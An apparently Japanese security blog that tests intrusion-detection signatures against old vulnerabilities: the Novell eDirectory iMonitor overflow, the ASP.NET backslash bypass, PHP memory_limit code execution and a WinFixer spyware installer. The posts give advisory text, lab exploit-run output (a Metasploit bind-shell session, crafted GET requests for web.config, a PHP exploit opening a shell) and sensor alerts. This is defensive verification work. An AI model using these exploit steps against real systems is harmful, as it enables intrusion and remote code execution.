つぶやき

このブログは,ご覧頂いたあなたのコンピュータが犯罪に利用されていないか?確認していただく為のひとつの手段としてご利用頂ければ幸いです。電子メール:amaterasu@job.email.ne.jp


テーマ:

Novell eDirectory iMonitor buffer overflow (HTTP_Novell_iMonitor_BO)

About this signature or vulnerability

Proventia G-Series, Proventia Desktop, Proventia Network IPS, RealSecure Server Sensor, RealSecure Network Sensor, Proventia M-Series, BlackICE Agent for Server, BlackICE PC Protection, BlackICE Server Protection, Proventia Server for Windows:

This signature detects an attempt to overflow Novell eDirectory Server iMonitor by sending a specially crafted URL



Default risk level

High

Sensors that have this signature

Proventia G-Series: XPU 24.38, Proventia Desktop: 8.0.812.1770, Proventia Network IPS: XPU 1.77, RealSecure Server Sensor: XPU 24.38, RealSecure Network Sensor: XPU 24.38, Proventia M-Series: XPU 1.77, BlackICE Agent for Server: 3.6epi, BlackICE PC Protection: 3.6cpi, BlackICE Server Protection: 3.6.cpi, Proventia Server for Windows: 1.0.914.1770

Systems affected

Windows NT: 4.0, Windows 2000: Any version, Novell eDirectory: 8.7.3, Windows 2003: Any version

Type

Unauthorized Access Attempt

Vulnerability description

Novell eDirectory is a software package that uses a Lightweight Directory Access Protocol (LDAP) directory service for integrating enterprise and eBusiness programs. Novell eDirectory version 8.7.3, when running on Microsoft Windows, is vulnerable to a buffer overflow caused by improper bounds checking in the iMonitor. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with SYSTEM level privileges or possibly cause dhost.ext to crash.

How to remove this vulnerability

Upgrade to the patch for this vulnerability, as listed in Novell Technical Information Document TID10098568. See References.


References

Secunia Security Advisory: SA16393
Novell eDirectory iMonitor Buffer Overflow Vulnerability
http://secunia.com/advisories/16393/  

Novell Technical Information Document TID10098568
Buffer overflow vulnerability against eDirectory 8.7.3 imonitor on Windows
http://support.novell.com/cgi-bin/search/searchtid.cgi?/10098568.htm  

Novell Technical Information Document TID2972038
eDirectory 8.7.3 iMonitor for Win32 - TID2972038
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972038.htm  

CERT Vulnerability Note VU#213165
Novell eDirectory iMonitor vulnerable to buffer overflow
http://www.kb.cert.org/vuls/id/213165  

ISS X-Force
Novell eDirectory iMonitor buffer overflow
http://www.iss.net/security_center/static/21794.php  

CVE
CVE-2005-2551
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2551  



■実証コード

===========================

Exploit: Name Default Description
-------- ------ --------------- -----------------------------------

optional SSL Use SSL
required RHOST 192.168.221.180 The target address
optional VHOST The virtual host name of the server
required RPORT 8008 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows (ALL) - eDirectory 8.7.3 iMonitor

msf edirectory_imonitor(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit Windows (ALL) - eDirectory 8.7.3 iMonitor
[*] Overflow request sent, sleeping for four seconds
[*] Exiting Bind Handler.

msf edirectory_imonitor(win32_bind) >


■検知

Date/Time 2006-06-18 22:26:11 JST
Tag Name HTTP_Novell_iMonitor_BO
Alert Name HTTP_Novell_iMonitor_BO
Severity High
Observance Type Intrusion Detection
Combined Event Count 1
Cleared Flag false
Target IP Address 192.168.37.180
Target Object Name 8008
Target Object Type Target Port
Source IP Address 192.168.221.11
SourcePort Name 1633
Sensor IP Address 10.4.6.100
Sensor Name network_sensor_1
:accessed yes
:evasions uses non-ASCII characters;
:intruder-ip-addr 192.168.221.11
:intruder-port 1633
:server 192.168.221.180:8008
:URL /nds/佞7JBJ・A@GG@荘NJB屁C7J舛7FOFKKHJB傲・Fヨ@'@B櫑O廿GB澄FH'ヨHJI鋒FN桝廂G菅CB姆N妁訂僊O・@鎗@F・・GHON訪・泡OF滲GCO・・訂@C・蜂ヨGO・吏湧・ヨFNB7NF廿敦BK價鵰'ヨ趨K友僭7'@ヨ炉@O崇剞的BGB剞A・・CA只I'H'婁選'呂哲O銭・'O7N
:victim-ip-addr 192.168.37.180
:victim-port 8008
algorithm-id 2106212
IANAProtocolId 6
Packet DestinationAddress 192.168.37.180
Packet DestinationPort 8008
Packet DestinationPortName http-alt
Packet SourceAddress 192.168.221.11
Packet SourcePort 1633


AD
いいね!した人  |  リブログ(0)

テーマ:


項目

攻撃

リモート

攻撃ポート

80

対象OS

Windows

CVE

CAN-2004-0847

MS

PAM

Microsoft ASP.NET Framework bypass security (HTTP_ASP_Security_Bypass)

このシグネチャまたは脆弱点について

RealSecure Network SensorRealSecure Server Sensor:


このシグネチャは、Microsoft ASP.NET Framework における正規化の脆弱点が原因で、リモートの攻撃者がセキュリティ制限を回避する可能性のある特殊な形式の URL 要求を検出します。


デフォルトの危険度

中危険度


このシグネチャが添付されているセンサー

RealSecure Network Sensor: XPU 22.34 以降、RealSecure Server Sensor: XPU 22.34 以降


影響を受けるシステム

Microsoft .NET Framework: 任意のバージョン、Microsoft ASP.NET: 任意のバージョン、Windows: 任意のバージョン


タイプ

不正アクセスの試み


脆弱点の説明

Microsoft ASP.NET Framework では、正規化の脆弱点が原因で、リモートの攻撃者がセキュリティ制限を回避する可能性があります。 ユーザーが正しく認証されない場合、web.config ファイルによってファイルへのアクセスが阻止されます。 リモートの攻撃者は、Mozilla を使用してバックスラッシュ (\) を含む特殊な形式の URL 要求を送信したり、Microsoft Internet Explorer を使用して URL エンコードされたバックスラッシュ (%5C) を含む要求を送信したりすることで、この認証方式を回避し、制限されているリソースに不正にアクセスすることができます。


この脆弱点の解決方法

Microsoft Corporation Web サイトから、ASP.NET HTTP モジュールをダウンロードします。




検証環境

優先度

OS

IP

Intruder:

Windows2000

192.168.221.11

Victim:

Windows2000

192.168.221.180

センサー

ProvenitaM10

XPU1.70


C:\tool>w3wp-dos.exe
============================================
w3wp-dos by Debasis Mohanty
www.hackingspirits.com
============================================

Usage: w3wpdos <HostIP / HostName>


C:\tool>w3wp-dos.exe 192.168.221.180
[+] Host name: [+] TEST-LR0IS30UAX
[+] Host IP: 192.168.221.180
[+] Ready to generate requests
[1] GET /aspnet-app\web.config HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[2] GET /aspnet-app\../aspnetlogs\log1.logs HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[3] GET /aspnet-app\default-userscreen.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[4] GET /aspnet-app\users/config.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[5] GET /aspnet-app\links/anycomref.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[6] GET /aspnet-app\com-ref-link1.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[7] GET /aspnet-app\com-ref-link2.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[8] GET /aspnet-app\com-ref-link3.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[9] GET /aspnet-app\com-ref-link4.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........


イベント詳細

HTTP_ASP_Security_Bypass


AD
いいね!した人  |  リブログ(0)

テーマ:

項目

攻撃

リモート

攻撃ポート

80

対象OS

Unix

CVE

CAN-2004-0594

MS


PHP memory_limit code execution (HTTP_PHP_Memory_Limit)

このシグネチャまたは脆弱点について

RealSecure Network SensorRealSecure Server Sensor:


このシグネチャは、複数の長いヘッダー名を含み、1 つの PHP リソースを要求する HTTP 要求を検出します。 イベントがトリガされる前に長いヘッダー名の数が検出される必要があリます。この数は調整パラメータ pam.http.php.mem.hdr.limit」を使用して制御できます。 また、検出された長いヘッダー名の数に関係なく、極端に大きなヘッダー名を含む PHP リソースへの HTTP 要求によっても、このイベントがトリガされます。


デフォルトの危険度

高危険度


このシグネチャが添付されているセンサー

RealSecure Network Sensor: XPU 24.17 以降、RealSecure Server Sensor: XPU 24.17 以降


影響を受けるシステム

Debian Linux: 3.0Slackware Linux: 8.1SuSE Linux: 8.0Conectiva Linux: 8.0SuSE Linux: 8.1Gentoo Linux: 任意のバージョン、OpenPKG: CURRENTTrustix Secure Linux: 1.5Windows: 任意のバージョン、Unix: 任意のバージョン、Linux: 任意のバージョン、Mandrake Linux: 9.2SuSE Linux: 9.0Conectiva Linux: 9.0Red Hat Advanced Workstation: 2.1Trustix Secure Linux: 2.0Slackware Linux: 9.1SuSE Linux: 8.2Slackware Linux: 9.0Red Hat Enterprise Linux: 2.1ESRed Hat Enterprise Linux: 2.1WSMandrake Linux: 9.1Red Hat Enterprise Linux: 2.1ASMandrake Linux Corporate Server: 2.1Slackware Linux: currentMandrake Multi Network Firewall: 8.2PHP: 4.3.7 以前、PHP5 5.0.0RC3 以前、Conectiva Linux: 10OpenPKG: 2.0Mandrake Linux: 10.0Trustix Secure Linux: 2.1Trustix Secure Enterprise Linux: 2SuSE Linux: 9.1


タイプ

不正アクセスの試み


脆弱点の説明

PHP は、多くの Web サーバー環境に使用される、クロスプラットフォームのサーバーサイド組み込み型スクリプト言語です。 PHP バージョン 4.3.7 以前および PHP5 バージョン 5.0.0RC3 以前では、リモートの攻撃者がサーバー上で任意のコードを実行する可能性があります。 memory_limit のサポートが有効になっていると、リモートの攻撃者は特殊な形式の要求を送信して、memory_limit 要求を終了させる可能性があります。これによって、不正な中断が行われ、PHP サーバー上で任意のコードが実行されます。


この脆弱点の解決方法

PHP4 の場合:

PHP Web サイトから、最新バージョンの PHP4 (4.30.8 以降) を入手してアップグレードします。

PHP5 の場合:

PHP Web サイトから、最新バージョンの PHP5 (13-Jul-2004 付けの 5.0.0 以降) を入手してアップグレードします。



実証コード
[root@linux iss]# ./phpnolimit01
Stage 1: Filling mem with bad pdestructor ... DONE
Stage 2: Triggering memory_limit now ... DONE
Shell on port 36864


トレース

HTTP_PHP_Memory_Limit.jpg


参照事項

ISS X-Force

PHP memory_limit code execution

http://www.iss.net/security_center/static/16693.php


CVE

CAN-2004-0594

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0594



AD
いいね!した人  |  リブログ(0)

テーマ:

項目

攻撃

スパイウェア

攻撃ポート

対象OS

Windows

CVE

MS


Suspicious ActiveX installer detected (Suspicious_ActiveX_Installer)
このシグネチャまたは脆弱点について
RealSecure Network Sensor、RealSecure Server Sensor:

このシグネチャは、疑わしい ActiveX コントロールをインストールする試みを検出します。 これは、被害者のコンピュータ上にスパイウェアをインストールする試みを示す場合があります。 このシグネチャは、pam.activex.ignore 調整パラメータを使用することで特定の製造元を無視するように設定することが可能です。


デフォルトの危険度
中危険度

このシグネチャが添付されているセンサー
RealSecure Network Sensor: XPU 24.2 以降、RealSecure Server Sensor: XPU 24.2 以降

影響を受けるシステム
Windows: Me、Windows 2000: 任意のバージョン、Windows: 98 Second Edition、Windows: XP、Windows NT: 4.0、Windows: 95、Windows: 98、Windows 2003: 任意のバージョン

タイプ
疑わしいアクティビティ

脆弱点の説明
疑わしい ActiveX インストーラが検出されました。 リモートの攻撃者は、被害者のコンピュータ上にスパイウェアをインストールしようとしている可能性があります。

この脆弱点の解決方法
対処法は見つかっていません。

最新のアンチウィルスまたはスパイウェア削除プログラムを使用して、ターゲット コンピュータがスパイウェア プログラムのホストになっているかどうかを判別します。


詳細

Suspicious ActiveX installer detected
http://www.iss.net/security_center/static/19182.php



コメント

WinFixer2005は、ユーザーのパソコンが何かの深刻なトラブルに遭遇していると誤解させ、怪しいソフトウェアの購入を強要する悪質なスパイウェアです。先日Hotbarの広告経由でこのツールがインストールされました。Provenitaでは、Suspicious_ActiveX_Installerというシグネチャでインストール行為が検知できることを確認しました。

検証環境

優先度

OS

IP

Intruder:


165.254.12.102

Victim:

Windows2000

192.168.221.180

検出手段

ProvenitaM10IPS

XPU1.66


入力コマンド

download.msgplus.net /files/MsgPlus-362.exe
download.winfixer.com /files/installers/WinFixer2005ScannerInstall_jp.exe
download.winfixer.com /files/installers/WinFixer2005Install_jp.exe
spweb.whenu.com /vvsn/prod/WUSVInst.exe
spweb.whenu.com /vvsn/prod/WHSE_sb.daemon1-DTLSapInst.exe
spweb.whenu.com /vvsn/prod/SAVEInst.exe
spweb.whenu.com /vvsn/cab/vsn_DAEMONTools.cab
/sites/winfixer.com/www/pages/scanner_jp/WinFixer2005ScannerInstall_jp.cab
/sites/winfixer.com/www/pages/scanner/WinFixer2005FreeInstall.cab


トレース

イベント詳細

Suspicious_ActiveX_Installer




参考情報

http://hjdb.higaitaisaku.com/database.cgi?cmd=dp&num=459

http://www.shareedge.com/spywareguide/product_show.php?id=2263

http://www.symantec.com/region/jp/avcenter/venc/data/jp-winfixer.html

http://blogs.sqlpassj.org/yamaken/archive/2005/11/08/14793.aspx

http://blog.lucanian.net/archives/50543119.html


いいね!した人  |  リブログ(0)

AD

ブログをはじめる

たくさんの芸能人・有名人が
書いているAmebaブログを
無料で簡単にはじめることができます。

公式トップブロガーへ応募

多くの方にご紹介したいブログを
執筆する方を「公式トップブロガー」
として認定しております。

芸能人・有名人ブログを開設

Amebaブログでは、芸能人・有名人ブログを
ご希望される著名人の方/事務所様を
随時募集しております。